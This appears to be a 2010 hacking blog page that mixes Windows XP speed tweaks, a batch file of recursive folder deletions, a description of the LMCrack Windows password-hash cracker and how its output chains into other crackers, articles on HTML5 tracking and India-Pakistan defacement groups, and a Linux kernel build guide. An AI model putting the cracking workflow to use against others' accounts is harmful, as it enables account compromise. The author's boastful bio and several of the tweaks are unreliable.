hahahah amol hacked ur ip address

Sign by Danasoft - For Backgrounds and Layouts

Author

Amol Bhure (ultra l33t) was born in Maharashtra, Seventh July Of Nineteen Hundred Nineteen Ninety A.D. He's currently pursuing his B.E in Bangalore. A cyber Security Professional, Hacker, Designer, Programmer. Keen interest in hacking and network security and he developed several techniques of defending and defacing websites. He's of the opinion that people should learn this art to prevent any cyber attacks. Currently Amol works as a member of 'Null International', Bangalore chapter as a network security guy. Apart from this, he has done internships at YAHOO! India, AMAZON India, etc. He has also attended various International conferences like NullCon GOA, c0c0n, ClubHack, Defcon , SecurityByte, ICFoCS, OWASP, etc.. He is certified with RHCE, LPT, CEH v7, SCJP, AFCEH. In programming he knows stuffs on C, C++, C# , JAVA (SCJP), .NET , and PHP. Additionally he knows few hardware languages like HDL, VHDL, Verilog, Embedded Micro controller Programming. He has been featured on google hall of fame. Amol was named a "India's top 10 hacker" by google. "World's top 50 hacking blog" by google.

Daily Page Views

Monday, December 27, 2010

Speed Up Windows Vista, 7 , And One Also use in XP

DISABLE INDEXING SERVICESIndexing Services is a small little program that uses large amounts of RAM
and can often make a computer endlessly loud and noisy. This system process
indexes and updates lists of all the files that are on your computer. It
does this so that when you do a search for something on your computer, it
will search faster by scanning the index lists. If you don't search your
computer often, or even if you do search often, this system service is
completely unnecessary. To disable do the following:
1. Go to Start
2. Click Settings
3. Click Control Panel
4. Double-click Add/Remove Programs
5. Click the Add/Remove Window Components
6. Uncheck the Indexing services
7. Click Next

OPTIMISE DISPLAY SETTINGS
Windows XP can look sexy but displaying all the visual items can waste
system resources. To optimise:
1.Go to Start
2. Click Settings
3. Click Control Panel
4. Click System
5. Click Advanced tab
6. In the Performance tab click Settings
7. Leave only the following ticked:
- Show shadows under menus
- Show shadows under mouse pointer
- Show translucent selection rectangle
- Use drop shadows for icons labels on the desktop
- Use visual styles on windows and buttons

DISABLE PERFORMANCE COUNTERS
Windows XP has a performance monitor utility which monitors several areas of
your PC's performance. These utilities take up system resources so disabling
is a good idea.
To disable:
1. download and install the Extensible Performance Counter List
2.Then select each counter in turn in the 'Extensible performance counters'
window and clear the 'performance counters enabled' checkbox at the
bottom.button below.

SPEEDUP FOLDER BROWSING
You may have noticed that everytime you open my computer to browse folders
that there is a slight delay. This is because Windows XP automatically
searches for network files and printers everytime you open Windows Explorer.
To fix this and to increase browsing significantly:
1. Open My Computer
2. Click on Tools menu
3. Click on Folder Options
4. Click on the View tab.
5. Uncheck the Automatically search for network folders and printers check
box
6. Click Apply
7. Click Ok
8. Reboot your computer

IMPROVE MEMORY USAGE
Cacheman Improves the performance of your computer by optimizing the disk
cache, memory and a number of other settings.
Once Installed:
1.Go to Show Wizard and select All
2.Run all the wizards by selecting Next or Finished until you are back to
the main menu. Use the defaults unless you know exactly what you are doing.
3.Exit and Save Cacheman
4.Restart Windows

OPTIMISE YOUR INTERNET CONNECTION
There are lots of ways to do this but by far the easiest is to run TCP/IP
Optimizer.
1. Download and install
2. Click the General Settings tab and select your Connection Speed (Kbps)
3. Click Network Adapter and choose the interface you use to connect to the
Internet
4. Check Optimal Settings then Apply
5. Reboot

OPTIMISE YOUR PAGEFILE
If you give your pagefile a fixed size it saves the operating system from
needing to resize the page file.
1. Right click on My Computer and select Properties
2. Select the Advanced tab
3. Under Performance choose the Settings button
4. Select the Advanced tab again and under Virtual Memory select Change
5. Highlight the drive containing your page file and make the initial Size
of the file the same as the Maximum Size of the file.
Windows XP sizes the page file to about 1.5X the amount of actual physical
memory by default. While this is good for systems with smaller amounts of
memory (under 512MB) it is unlikely that a typical XP desktop system will
ever need 1.5 X 512MB or more of virtual memory. If you have less than 512MB
of memory, leave the page file at its default size. If you have 512MB or
more, change the ratio to 1:1 page file size to physical memory size.

RUN BOOTVIS - IMPROVE BOOT TIMES
BootVis will significantly improve boot times
1. Download and Run
2. Select Trace
3. Select Next Boot and Driver Trace
4. A Trace Repetitions screen will appear, select Ok and Reboot
5. Upon reboot, BootVis will automatically start, analyze and log your
system's boot process. When it's done, in the menu go to Trace and select
Optimize System
6. Reboot.
7. When your machine has rebooted wait until you see the Optimizing System
box appear. Be patient and wait for the process to complete

REMOVE THE DESKTOP PICTURE
Your desktop background consumes a fair amount of memory and can slow the
loading time of your system. Removing it will improve performance.
1. Right click on Desktop and select Properties
2. Select the Desktop tab
3. In the Background window select None
4. Click Ok

REMOVE FONTS FOR SPEED
Fonts, especially TrueType fonts, use quite a bit of system resources. For
optimal performance, trim your fonts down to just those that you need to use
on a daily basis and fonts that applications may require.
1. Open Control Panel
2. Open Fonts folder
3. Move fonts you don't need to a temporary directory (e.g. C:FONTBKUP?)
just in case you need or want to bring a few of them back. The more fonts
you uninstall, the more system resources you will gain.

DISABLE UNNECESSARY SERVICES
Because Windows XP has to be all things to all people it has many services
running that take up system resources that you will never need. Below is a
list of services that can be disabled on most machines:
Alerter
Clipbook
Computer Browser
Distributed Link Tracking Client
Fast User Switching
Help and Support - (If you use Windows Help and Support leave this enabled)
Human Interface Access Devices
Indexing Service
IPSEC Services
Messenger
Netmeeting Remote Desktop Sharing (disabled for extra security)
Portable Media Serial Number
Remote Desktop Help Session Manager (disabled for extra security)
Remote Procedure Call Locator
Remote Registry (disabled for extra security)
Remote Registry Service
Secondary Logon
Routing & Remote Access (disabled for extra security)
Server
SSDP Discovery Service - (Unplug n' Pray will disable this)
Telnet
TCP/IP NetBIOS Helper
Upload Manager
Universal Plug and Play Device Host
Windows Time
Wireless Zero Configuration (Do not disable if you use a wireless network)
Workstation
To disable these services:
Go to Start and then Run and type "services.msc"
Doubleclick on the service you want to change
Change the startup type to 'Disable"
TURN OFF SYSTEM RESTORE
System Restore can be a useful if your computer is having problems, however
storing all the restore points can literally take up Gigabytes of space on
your hard drive. To turn off System Restore:
Open Control Panel
Click on Performance and Maintenance
Click on System
Click on the System Restore tab
Tick 'Turn off System Restore on All Drives'
Click 'Ok'

DEFRAGMENT YOUR PAGEFILE
Keeping your pagefile defragmented can provide a major performance boost.
One of the best ways of doing this is to creat a separate partition on your
hard drive just for your page file, so that it doesn't get impacted by
normal disk usage. Another way of keeping your pagefile defragmented is to
run PageDefrag. This cool little app can be used to defrag your pagefile,
and can also be set to defrag the pagefile everytime your PC starts. To
install:
Download and Run PageDefrag
Tick "Defrag at next Reboot",
Click "Ok"
Reboot

SPEEDUP FOLDER ACCESS - DISABLE LAST ACCESS UPDATE
If you have a lot of folders and s
ubdirectories on your computer, when you
access a directory XP wastes a lot of time updating the time stamp showing
the last access time for that directory and for ALL sub directories. To stop
XP doing this you need to edit the registry. If you are uncomfortable doing
this then please do not attempt.
Go to Start and then Run and type "regedit"
Click through the file system until you get to
"HKEY_LOCAL_MACHINESystemCurrentControlSetControlFileSystem"
Right-click in a blank area of the window on the right and select 'DWORD
Value'
Create a new DWORD Value called 'NtfsDisableLastAccessUpdate'
Then Right click on the new value and select 'Modify'
Change the Value Data to '1'
Click 'OK'

DISABLE SYSTEM SOUNDS
Surprisingly, the beeps that your computer makes for various system sounds
can slow it down, particularly at startup and shut-down. To fix this turn
off the system sounds:
Open Control Panel
Click Sounds and Audio Devices
Check Place volume icon in taskbar
Click Sounds Tab
Choose "No Sounds" for the Sound Scheme
Click "No"
Click "Apply"
Click "OK"

IMPROVE BOOT TIMES
A great new feature in Microsoft Windows XP is the ability to do a boot de
fragment. This places all boot files next to each other on the disk to allow
for faster booting. By default this option in enables but on some builds it
is not so below is how to turn it on.
Go to Start Menu and Click Run
Type in "Regedit" then click ok
Find "HKEY_LOCAL_MACHINESOFTWAREMicrosoftDfrgBootOpt imizeFunction"
Select "Enable" from the list on the right
Right on it and select "Modify"
Change the value to "Y to enable"
Reboot

IMPROVE SWAPFILE PERFORMANCE
If you have more than 256MB of RAM this tweak will considerably improve your
performance. It basically makes sure that your PC uses every last drop of
memory (faster than swap file) before it starts using the swap file.
Go to Start then Run
Type "msconfig.exe" then ok
Click on the System.ini tab
Expand the 386enh tab by clicking on the plus sign
Click on new then in the blank box type"ConservativeSwapfileUsage=1"
Click OK
Restart PC

MAKE YOUR MENUS LOAD FASTER
This is one of my favourite tweaks as it makes a huge difference to how fast
your machine will 'feel'. What this tweak does is remove the slight delay
between clicking on a menu and XP displaying the menu.
Go to Start then Run
Type 'Regedit' then click 'Ok'
Find "HKEY_CURRENT_USERControl PanelDesktop"
Select "MenuShowDelay"
Right click and select "Modify'
Reduce the number to around "100"
This is the delay time before a menu is opened. You can set it to "0" but it
can make windows really hard to use as menus will open if you just look at
them - well move your mouse over them anyway. I tend to go for anywhere
between 50-150 depending on my ........

MAKE PROGRAMS LOAD FASTER
This little tweak tends to work for most programs. If your program doesn't
load properly just undo the change. For any program:
Right-click on the icon/shortcut you use to launch the program
Select properties
In the 'target' box, add ' /prefetch:1' at the end of the line.
Click "Ok"
Voila - your programs will now load faster.

IMPROVE XP SHUTDOWN SPEED
This tweak reduces the time XP waits before automatically closing any
running programs when you give it the command to shutdown.
Go to Start then select Run
Type 'Regedit' and click ok
Find 'HKEY_CURRENT_USERControl PanelDesktop\'
Select 'WaitToKillAppTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'
Now select 'HungAppTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'
Now find 'HKEY_USERS.DEFAULTControl PanelDesktop'
Select 'WaitToKillAppTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'
Now find 'HKEY_LOCAL_MACHINESystemCurrentControlSetControl\'
Select 'WaitToKillServiceTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'

SPEED UP BOOT TIMES I
This tweak works by creating a batch file to clear the temp and history
folders everytime you shutdown so that your PC doesn't waste time checking
these folders the next time it boots. It's quite simple to implement:
1. Open Notepad and create a new file with the following entries:
RD /S /q "C:Documents and Settings"UserName without quotes"Local
SettingsHistory"
RD /S /q "C:Documents and SettingsDefault UserLocal SettingsHistory"
RD /S /q "D:Temp" <--"Deletes temp folder, type in the location of your temp
folder"
2. Save the new as anything you like but it has to be a '.bat' file e.g.
fastboot.bat or deltemp.bat
3. Click 'Start' then 'Run'
4. Type in 'gpedit.msc' and hit 'ok'
5. Click on 'Computer Configuration' then 'Windows Settings'
6. Double-click on 'Scripts' and then on 'Shutdown'
7. Click 'Add' and find the batch file that you created and then press 'Ok'

SPEED UP BOOT TIMES II
When your PC starts it usually looks for any bootable media in any floppy or
cd-rom drives you have installed before it gets around to loading the
Operating System from the HDD. This can waste valuable time. To fix this we
need to make some changes to the Bios.
1. To enter the bios you usually press 'F2' or 'delete' when your PC starts
2. Navigate to the 'Boot' menu
3. Select 'Boot Sequence'
4. Then either move your Hard drive to the top position or set it as the
'First Device'
5. Press the 'Escape' key to leave the bios. Don't forget to save your
settings before exiting
Note: Once this change has been made, you won't be able to boot from a
floppy disc or a CD-rom. If for some strange reason you need to do this in
the future, just go back into your bios, repeat the steps above and put your
floppy or CD-rom back as the 'First Device'

SPEED UP BOOT TIMES III
When your computer boots up it usually has to check with the network to see
what IP addresses are free and then it grabs one of these. By configuring a
manually assigned IP address your boot time will improve. To do this do the
following:
1. Click on 'Start' and then ''Connect To/Show All Connections'
2. Right-click your network adapter card and click 'Properties'.
3. On the 'General' tab, select 'TCP/IP' in the list of services and click
'Properties'
4.I n the TCP/IP properties, click 'Use the following address' and enter an
IP address for your PC. If you are using a router this is usually
192.168.0.xx or 192.168.1.xx. If you are not sure what address you could
check with your ISP or go to 'Start/run' and type 'cmd' and then
'ipconfig/all'. This will show your current IP settings which you will need
to copy.
5. Enter the correct details for 'Subnet mask', 'Default gateway' and 'DNS
Server'. Again if you are not sure what figures to enter use 'ipconfig/all'
as in stage 4.

FREE UP MEMORY
I found this useful app via FixMyXP. ClearMem Is an Excellent Tool for
speeding up your XP Computer (especially if your system has been on for
awhile and you have a lot of applications open). What it does, is it Forces
pages out of physical memory and reduces the size of running processes if
working sets to a minimum. When you run this tool, the system pauses because
of excessive high-priority activity associated with trimming the working
sets. To run this tool, your paging file must be at least as large as
physical memory. To Check your Paging File:
1. Go to your control panel, then click on 'System', then go to the
'Advanced' Tab, and Under 'Performance' click 'Settings' then the 'Advanced'
Tab
2. On the Bottom you should see 'Virtual Memory' and a value. This is the
value that must be at least as large as how much memory is in your system.
3. If the Virtual Memory Value is smaller than your system memory, click
Change and change the Min Virtual Memory to a number that is greater than
your total system memory, then click 'Set' and Reboot.
4. Once you have rebooted install ClearMem

ENSURE XP IS USING DMA MODE
XP enables DMA for Hard-Drives and CD-Roms by default on most ATA or ATAPI
(IDE) devices. However, sometimes computers switch to PIO mode which is
slower for data transfer - a typical reason is because of a virus. To ensure
that your machine is using DMA:
1. Open 'Device Manager'
2. Double-click 'IDE ATA/ATAPI Controllers'
3. Right-click 'Primary Channel' and select 'Properties' and then 'Advanced
Settings'
4. In the 'Current Transfer Mode' drop-down box, select 'DMA if Available'
if the current setting is 'PIO Only'

ADD CORRECT NETWORK CARD SETTINGS
Some machines suffer from jerky graphics or high CPU usage even when a
machine is idle. A possible solution for this, which, can also can help
network performance is to:
1. RightClick 'My Computer'
2. Select 'Manage'
3. Click on 'Device Manager'
4. DoubleClick your network adaptor under 'Network Adapters'
5. In the new window, select the 'Advanced' tab
6. Select 'Connection Type' and select the correct type for your card and
then Reboot

REMOVE ANNOYING DELETE CONFIRMATION MESSAGES
Although not strictly a performance tweak I love this fix as it makes my
machine 'feel' faster. I hate the annoying 'are you sure?' messages that XP
displays, especially if I have to use a laptop touchpad to close them. To
remove these messages:
1. Right-click on the 'Recycle Bin' on the desktop and then click
'Properties'
2. Clear the 'Display Delete Confirmation Dialog' check box and click 'Ok'
If you do accidently delete a file don't worry as all is not lost. Just go
to your Recycle Bin and 'Restore' the file.

DISABLE PREFETCH ON LOW MEMORY SYSTEMS
Prefetch is designed to speed up program launching by preloading programs
into memory - not a good idea is memory is in short supply, as it can make
programs hang. To disable prefetch:
1. Click 'Start' then 'Run'
2. Type in 'Regedit' then click 'Ok'
3. Navigate to 'HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession
ManagerMemory ManagementPrefetchParameters\'
4. Right-click on "EnablePrefetcher" and set the value to '0'
5. Reboot.

Is This File Safe to Delete?

Occasionally, you'll want to delete unwanted files to free up space on your hard drive. It is usually easy to choose which.jpg,.doc or.xls documents to throw away.

However, what about the many gigabytes of.dat files? Are these safe to delete, or will it cause your computer to crash?

The extension.dat stands for data file. These are used by many applications so you can't know what it stands for without knowing the application that created it. Thankfully, even if you don't recognize the extension, the following steps can help determine if any file type is safe to delete.

1. Back up the File: Copy it to a hard drive, CD, another computer, anything. Just make sure to save the file first so you can get it back if you actually needed it.

2. Rename the File: After you rename the file, (remember to record the original name), use different applications on the computer and then reboot. If an error occurs due to the missing file name, you know what the file did and you can decide if you need to replace it. If no error occurred, move on to the next step.

3. Delete the File: First, make sure you've saved the file in step #1. After that, delete the file in question. Then, use your computer for a while, reboot, and experiment with different applications. If an error occurs, you know what the file did and can assess the situation from there. If no error appears, you're probably off the hook. Still it is important to keep the back up. An error may occur later if the file is connected to an application you rarely use.

4. The computer may not allow you to delete or rename the file. This indicates the file does matter. Use a tool, such as Process Explorer, available from Microsoft's website, to learn which application is using it. Then you can decide if you need to keep the file.

Set Permanent Path In System For JAVA

  • It is possible to make the path setting permanent but you have to be very careful because your system might crash if you make a mistake. Proceed with extreme caution! 
  • Go to Control Panel, choose "System," click on the "Advanced" tab, click on the "Environment variables" button. In the lower list, "System variables," click on Path ,

    Click "Edit" and at the end append
    ;C:\Program Files\Java\jdk1.5.0_09\bin
    (or the path to the appropriate folder where the latest version of JDK is installed). 
  • Do not put spaces before the appended path string.
  • Click OK on the path edit box and OK on the Ennvironment Variables box.
  •  The new setting will go into effect next time you run Command Prompt.

Window Password Cracking

LMCrack works by searching for a password hash against a database of pre-computed hashes. The pre-computed hashes are derived from multiple dictionaries of real words rather than random character sequences. The pre-computed hashes are indexed to speed up the hash searching against the database.

Each 32-byte hash is split into two 16-byte halves and each half is searched for against the database of pre-computed hashes independently of the other half . As the hash is composed of two halves, cracking the password will often result in a partial password being found where one 16-byte hash exists in the database and the other 16-byte hash does not.

LMCrack outputs 5 files at the completion of a cracking run:

* cracked.txt - a file containing the successfully cracked username and passwords delimited by a colon,

* cracked.dic - a file contaning all of the dictionary words found,

* partial.dic - a file containging the partial password fragments,

* newpwdump.txt - a rewritten PWDump file with the successfully cracked accounts removed,

* stats.txt - the cumalative statistics for all cracking runs.

The cracked.txt and cracked.dic files can be used as input for other password crackers, for example the cracked.txt file works nicely as input for Brutus for testing web based or telnet passwords. Partial.dic is useful as a dictionary file for L0pht to speed up the cracking of partially cracked passwords. Newpwdump.txt can be fed into other cracking programs such as rainbowcrack if a comprehensive password audit is required.

HTML 5 To Make Online Tracking Easy

Worries over internet privacy have spurred lawsuits, conspiracy theories and consumer anxiety as marketers and others invent new ways to track computer users on the internet. But the alarmists have not seen anything yet.

In the next few years, a powerful new suite of capabilities will become available to web developers that could give marketers and advertisers access to many more details about computer users' online activities. Nearly everyone who uses the internet will face the privacy risks that come with those capabilities, which are an integral part of the web language that will soon power the internet: HTML 5. 

The new web code, the fifth version of Hypertext Markup Language used to create web pages, is already in limited use, and it promises to usher in a new era of internet browsing within the next few years. It will make it easier for users to view multimedia content without downloading extra software; check email offline; or find a favourite restaurant or shop on a smart phone.

Most users will clearly welcome the additional features that come with the new web language."It's going to change everything about the internet and the way we use it today," said James Cox, 27, a freelance consultant and software developer at Smokeclouds, a New York City start-up company. "It's not just HTML 5. It's the new Web." But others, while also enthusiastic about the changes, are more cautious.

Most web users are familiar with cookies, which make it possible, for example, to log on to websites without having to retype user names and passwords, or to keep track of items placed in virtual shopping carts before they are bought.

The new web language and its additional features present more tracking opportunities because the technology uses a process in which large amounts of data can be collected and stored on the user's hard drive while online. Because of that process, advertisers and others could, experts say, see weeks or even months of personal data. That could include a user's location, time zone, photographs, text from blogs, shopping cart contents, emails and a history of the web pages visited.

The new web language "gives trackers one more bucket to put tracking information into," said Hakon Wium Lie, the chief technology officer at Opera, a browser company.

Or as Pam Dixon, the executive director of the World Privacy Forum in California, said: "HTML 5 opens Pandora's box of tracking in the  internet."The additional capabilities provided by the new web language are already being put to use by a California programmer who has created what, at first glance, could be a major new threat to online privacy.

Samy Kamkar, a California programmer best known in some circles for creating a virus called the "Samy Worm," which took down MySpace.com in 2005, has created a cookie that is not easily deleted, even by experts – something he calls an Evercookie.

Some observers call it a "supercookie" because it stores information in at least 10 places on a computer, far more than usually found. It combines traditional tracking tools with new features that come with the new web language. In creating the cookie, Kamkar has drawn comments from bloggers across the internet whose descriptions of it range from "extremely persistent" to "horrific."Kamkar, however, said he did not create it to violate anyone's privacy. He was curious about how advertisers tracked him on the internet. After cataloging what he found on his computer, he made the Evercookie to demonstrate just how thoroughly people's computers could be infiltrated by the latest internet technology.

"I think it's OK for them to say we want to provide better service," Kamkar said of advertisers who placed tracking cookies on his computer. "However, I should also be able to opt out because it is my computer."Kamkar, whose 2005 virus circumvented browser safeguards and added more than a million "friends" to his MySpace page in less than 20 hours, said he had no plans to profit from the Evercookie and did not intend to sell it to advertisers.

Saturday, December 11, 2010

Indian and Pakistani hackers at peace

A few years ago, Indian and Pakistani hacker groups had launched an online war against each other.  Every day, techies from both countries used to logon and bring down or deface websites in each other’s countries.  By all accounts, the Indian and Pakistani Governments were not involved and this was the work of individuals and hacker groups.
Then on Nov 30, 2008 a statement was published in some blogs that the Indian and Pakistani hackers had made peace and decided not to attack each other.  The hacker cyber peace deal held up till July, 2010 but it seems that there is a new risk of cyber war between tech savvy computer specialists from both countries.  By all accounts, this is a war between individuals and groups rather than Government sanctioned hacker attacks.On Aug 15, 2010, the website of high profile Indian businessman, politician and IPL team owner, Vijay Mallya, was defaced by Pakistani hackers who left flags and pro Pakistan text on the compromised site. Vijay Mallya is a media natural and was soon on Times, CNN and every media house that wanted his views on his personal website being attacked.  It even made it to the prime news time.  No Indian mainstream media mentioned the fact that Pakistani sites were also attacked.But it seems that Indian hackers have also done the same thing.  An Indian ethical hacker has compiled a list of sites hacked in both India and Pakistan over the weekend and it seems that hundreds of Pakistani sites went down.  The Pakistan attack was lead by Pak Cyber Army and PakHaxors while Indian hacker groups Indishell and Indian Cyber Army lead the attack or counter attack.Are we witnessing the start of another hacking war between the two countries?

Indo Pak Cyber deal holds
A few years ago, Indian and Pakistani hacker groups had launched an online war against each other.  Every day, techies from both countries used to logon and bring down or deface websites in each others countries.  By all accounts, the Indian and Pakistani Governments were not involved and this was the work of individuals and hacker groups.
Then on Nov 30, 2008 a statement was published in some blogs that the Indian and Pakistani hackers had made peace and decided not to attack each other.  In a joint statement to Chowrangi.com, PCA (Pakistan Cyber Army), Zombie_ksa (PAKbugs) and ICW (Indian Cyber Warriors and Hindu Militant Group) said they had made peace. (Full story at end of this article).
The cross border hacker peace treaty held well over the last few years.  Then the dynamics changed in early July, 2010 when the Pakistani Government arrested most members of the high profile Pakistani hacking group PAKbugs.  The Pakistan Government claims that they clamped down on PAKbugs due to complaints from within their own country.  Even as the Pakistan Government arrested PAKbugs, about 130 Pakistani sites were hacked.
Could Indian techies be mistakenly blamed for the hacking of 130 Pakistani sites?  No one was sure but the situation had all the ingredients of suspicion and misunderstanding and could blow up into another hacker war on the internet.
But if you needed more proof that there are many people in both Pakistan and India who want peace and good neighbourly relations, it came in the form of a statement by powerful Pakistani hacking collective PCA (Pakistan Cyber Army).  They toldpropakistani

“Message from Pakistan Cyber Army on arrest of Pakbugs Members
If anyone has doubt that we are not the one who defaced ONGC then get a life first. If people have forgotten, then we are the same guys who defaced ONGC in response to the attack on OGRA. After which we did a peace deal with the groups involved on both sides of borders including “Pakbugs” and “ICW” but kids didn’t keep their promise and got arrested.
We told PakBugs many (many, many, many) times to not to deface/destroy Pakistani websites and infrastructure. We told them to take FIA and NR3C seriously – as these agencies are not bunch of NOOBS, we had warned Pakbugs that you people don’t know about the power and the resources that NR3C has got but they gave a damn to our words and ended up in their custody.
I feel sad about the kids but… it happened due to their carelessness and childish attitude, which eventually landed them in the jail.
If you people are upcoming hackers and don’t know about Prevention of Electronic Crimes Ordinance then go and read it on NR3C website. I fear that Pakbugs would have a jail of 7 years if they got trialed and if FIA bail them out with some punishment they should thank Allah and concentrate on their studies.
We always told Jawad (HUMZA) and other kids about the consequences that they may face if arrested. [Jawad correct me if I am wrong].
Request to FIA/NR3C
“It is our humble request to FIA (NR3C) authorities to consider the case realistically and don’t give the kids the capital punishment as they are kids and can improve if given a chance. If they get the capital punishment as mentioned in Prevention of Electronic Crimes Ordinance, then their future will be ruined. Sir, these are our kids and our force if given a direction“
Message for upcoming Hackers
Our message to upcoming hackers or people who are interested in this field is that there is nothing bad to have the knowledge of hacking or hacking techniques, what’s bad is the usage of such knowledge and skill against our own country, national and international organizations or departments – that may cause damage to our country and its repute in the world.  Don’t push your efforts to get famous. The fame will come with time.

hacking-computers-emails-websites

What you need:

  1. A Linux box
  2. Root on this Linux box (or a sympathetic admin)
  3. The ability to reboot this box several times a day
  4. A compilation environment installed
  5. Some way to get the kernel source

In more detail:

  1. Your Linux box needs to have at least 300 MB of free disk space. Find out how much disk space you have free with the command df -h. If you need tips for clearing out some disk space, ask. Note that you can compile on one Linux box and run the kernel you compile on another Linux box. You should compile on the fastest Linux box possible. A 500 Mhz Pentium III with 256 MB RAM will take around 40 minutes to compile a Linux kernel, a 1200 MHz Pentium III with 640 MB RAM will take around 10 minutes, whereas a Duron 800 Mhz with 256 MB RAM will take around 5 minutes.
    I've personally worked with x86's, Alpha's, and PowerPC's, but if you have something else I'm willing to help you figure it out. When asking questions, be sure to let people know if you are compiling for something other than an x86.
  2. You don't _need_ root, but you at least need someone with root to set you up. What you need is the ability to boot your new kernel, which may include the ability to run LILO, to copy kernels to places outside your home directory, and the ability to reboot the machine. I do 99% of my kernel work as a non-root user. I compile in a directory owned by user val, and I made the directories I need to write to owned by user val. You can also give the user reboot a password, so you can reboot the machine without su-ing to root. Talk to your sysadmin to find out what you need to do.
  3. Ideally, your Linux box is something only you need. If other people need it during the day but don't at night, you can probably still use it. If you are concerned about making the box unusable, there are many ways to test a new kernel and then reboot back into your old kernel. Disk corruption is not as common as you think, but if you do not want to risk the data on your hard disk, you can use a ramdisk with your new kernel. (Ramdisks are explained later on.) You can also create a new partition on your hard disk and use that as your root filesystem when you are experimenting with new kernels.
  4. Hopefully, most people installed their Linux box with gcc and other compilation tools included. You can test to see if you have a compilation environment installed by copying the following into a file named hello.c:
    #include <stdio.h>
    
       int
       main (void)
       {
     printf ("Hello, world!\n");
     return 0;
       }
    
    And then compiling and running it with:
    $ gcc hello.c -o hello
       $ ./hello
    
    If this doesn't work, you will need to install a compilation environment. Usually the easiest way to do this is to just re-install your machine.
  5. There are many different ways to get the kernel source, but my preferred one involves having a reasonably high bandwidth net connection. Otherwise, you can get the kernel source from your distribution CD's.
    Remember, if you have any questions, please ask them on the grrls-only list, instead of emailing someone privately. The list members will answer your questions politely and helpfully, and other list members will learn from the answers to your questions. Our goal is to never answer a question with "FAQ, read #14 on XYZ," or "Do a web search," or "RTFM." Communicating with other kernel developers is just as important as finding the answer to your question.
    Get the Source
    Now, you need to get the Linux source. There are many different ways of getting the Linux source, but I'll list them in order of preference. You only need to choose one of these options. While it's easiest to just install the source on your distribution CD, you'll need to stay up to date with the latest version of the Linux source if you want to participate in kernel development.
    Linus recommends not having a /usr/src/linux symbolic link to your kernel source tree. However, the /usr/src/linux link will sometimes be used as a default by some modules that compile outside the kernel. If you need it, make sure it points to the correct kernel tree. If it doesn't, modules that compile outside the kernel may use the wrong header files.
  6. Use BitKeeper to clone a Linux source repository. This is what I use, and it's what many other kernel hackers use, including the entire PowerPC team, Ted T'so, Rik van Riel, and Linus himself. Be warned, this requires downloading many megabytes of data, so don't use it if you have a slow link. This option also requires at least 1 GB of free disk space, which is significantly more than the other options.
  7. First, get BitKeeper: http://www.bitmover.com/cgi-bin/download.cgi Follow the instructions and it will tell you how to download and install BitKeeper. Then, clone the main Linux tree using BitKeeper                         $ cd /usr/src (or wherever you would like to work)   $ bk clone bk://linux.bkbits.net/linux-2.6 linux-2.6 $ cd linux-2.6 $ bk -r co
  8. And now you have a kernel source tree! Learn more about how to use BitKeeper here:
    http://www.bitkeeper.com/Test.html
    1. FTP the kernel source from ftp.kernel.org. This is another bandwidth intensive operation, so don't use it if you have a slow link.
  9. FTP to your local kernel mirror, which is named:
    ftp.<country code>.kernel.org
    For example, I live in the US, so I do:
    $ ftp ftp.us.kernel.org
    Login (if necessary) with username ftp or anonymous. Change directory to pub/linux/kernel/v2.6 and download the latest kernel. For example, if the latest version is 2.6.9, download the file named:
    linux-2.6.9.tar.gz
    Usually there is a file named LATEST-IS-<version> to tell you what the latest version is. I recommend the gzipped format (filename ending in .gz) instead of bzip2 format (filename ending in.bz2) since bzip2 takes a long time to decompress.
    Untar and uncompress the file in the directory where you are planning to work.
    You now have your Linux kernel source.
    1. Install the kernel source from your distribution CD. If you already have a directory named /usr/src/linux and it contains more than one directory, you already have the source installed. If you don't, read on.
  10. Mount your installation CDROM. On a RedHat based system, the source RPM is usually in <DistributionName>/RPMS/ and is named:
    kernel-source-<version>.<arch>.rpm
    One way to find the kernel source package is to run this command, assuming your CD is mounted at /mnt/cdrom:
    $ find /mnt/cdrom -name \*kernel-\*
    Install the RPM using:
    $ rpm -iv <pathname>/kernel-source-<version>.<arch>.rpm
    The v switch will tell you if it fails or not.
    If your system is not RPM-based, please let us know how to install the kernel source from your distribution CD.
    • There are various other ways to get the kernel source, involving CVS or rsync. If you would like to write instructions for one of these other methods of getting the kernel source, go ahead and we'll include them here.
    Why do I recommend BitKeeper over ftp, and ftp over vendor source? BitKeeper handles creating patches for you. (A patch contains the differences between one source tree and another source tree.) BitKeeper also applies the latest changes for you. When I want to update my tree, I just type:
    $ bk pull
    
    And most of the time, it just works. The only time I have to do work is if I have written code that conflicts with the new code downloaded from the parent tree. When I want to make a patch to send to somebody, I just type:
    $ bk citool
       $ bk -hr<latest revision number> | bk gnupatch > newpatch
    
    When I want to undo my latest changes, I type:
    $ bk undo -r<latest revision number>
    
    BitKeeper has all kinds of pretty GUI tools to make debugging and merging code easier. I like BitKeeper so much I wrote a paper about it. You can find the paper and some slides on my web page: http://www.nmt.edu/~val I prefer the vanilla kernel source from ftp.kernel.org over the vendor source because you never know what changes the vendor has made to the source. Most of the time, the vendor has improved the tree, but often they make changes of dubious value to a kernel hacker. For example, RedHat 6.2 shipped a kernel that compiled differently depending on whether you were running an SMP kernel at the time of compilation. This makes sense if you are just recompiling a kernel for that machine, but it was useless if you were trying to compile a kernel for a different machine. The other reason to use vanilla source instead of vendor source is if you want to create and send patches to other kernel developers. If you create a patch and send it to the Linux kernel mailing list for inclusion in the main kernel tree, it had better be against the latest vanilla source tree. If you create a patch on a vendor source tree, it's unlikely to apply to a vanilla source tree. The one place where vendor source is crucial is for non-x86 architectures. The vanilla source almost never builds and boots on an architecture other than x86. Often, the best place to get a working kernel for a non-x86 is the vendor source. Each architecture usually has some quirky way of getting the latest source in addition to the vendor-supplied source.
  11. Configure Your Kernel
    The Linux kernel comes with several configuration tools. Each one is run by typing make <something>config in the top-level kernel source directory. (All make commands need to be run from the top-level kernel directory.)
    1. make config

    2. This is the barebones configuration tool. It will ask each and every configuration question in order. The Linux kernel has a LOT of configuration questions. Don't use it unless you are a masochist.
    Each of the configuration programs produces these end products:
    1. A file named .config in the top-level directory containing all your configuration choices.
